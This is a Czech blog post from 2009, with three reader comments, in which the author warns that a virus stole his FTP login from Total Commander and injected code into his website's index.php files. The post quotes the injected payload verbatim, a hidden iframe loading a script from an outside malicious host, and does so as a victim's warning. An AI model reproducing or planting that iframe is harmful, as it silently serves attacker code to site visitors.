Internetová kriminalita roste a roste
30. 7. 2009 – 9.47
Pozor, šíří se viry, které dokáží vycucnout z TotalCommandera přístupová údaje k ftp účtu a následně změnit vaši www prezentaci!!!
Včera jsem měl zavirovaný počítač a dnes ráno to mělo pokračování v podobě mých nefunkčních www stránek. Naštěstí nefunkčních, protože jinak bych si ničeho nevšiml. Do každého souboru s názvem index.php jsem měl přidán navíc tento cizí kód:
<iframe src=“http://x9y.ru:8080/ts/in.cgi?pepsi120″ width=125 height=125 style=“visibility: hidden“></iframe>
Je to kód, který se na vzhledu a funkčnosti www stránek běžně nijak neprojeví (díky bohu u mě náhodou způsobil chybu skriptu), ale způsobí, že se návštěvníkům zároveň s prohlížením vaší stránky spustí kód nějakého ruského hekerského šmejda pod nickem „pepsi120″. Je „vtipné“, že tento škodlivý kód on může variabilně měnit, podle svých nekalých plánů. Zatím skript nedělal nic, jen zřejmě registroval počet spuštění, to aby mr. „pepsi 120″ věděl, kolik webů už infikoval.
To je tedy průšvih, protože dosud jsem měl zato, že když se člověk vyhýbá „pornu a warezu“, tak je surfování po webu relativně bezpečné. Už není. Tímto mechanismem může být napadena jakákoliv „seriózní“ stránka…
Protože jsou výrobci virů vždy o krůček napřed, obávám se, že ani investice do drahých softwérů není to pravé. Na počítači mi běží Avast, Windows defender a Spyware terminator, a stejně jsem byl infikován při prohlížení běžného webu. Řešení může být snad investice do něčeho takového jako http://www.sandboxie.com/
Více o nebezpečí ukládání hesel v TC zde:
http://www.dsl.cz/clanky-dsl/clanek-1018/Nebezpecny-Total-Commander
3 Responses to “Internetová kriminalita roste a roste”
Na čem máš ten web puštěnej? Byl jsem svědkem sázky, kdy správce linux serveru nabízel nějaké všimné, když se mu někdo do něj dokáže probourat, tuším, že tam měl i apache. Zatim se nikdo neozval, že by uspěl.
No, držim palce
Vencour
By Vencour on Čvc 30, 2009
toto napadnutie som mal pred 3 tyzdnami a napadne vecsinou index subory
By Anonymní on Čvc 30, 2009
Ok a co jste dělali, aby se to neopakovalo, víte, čim prošel? Našli jste exploit etc?
Vencour
By Vencour on Srp 4, 2009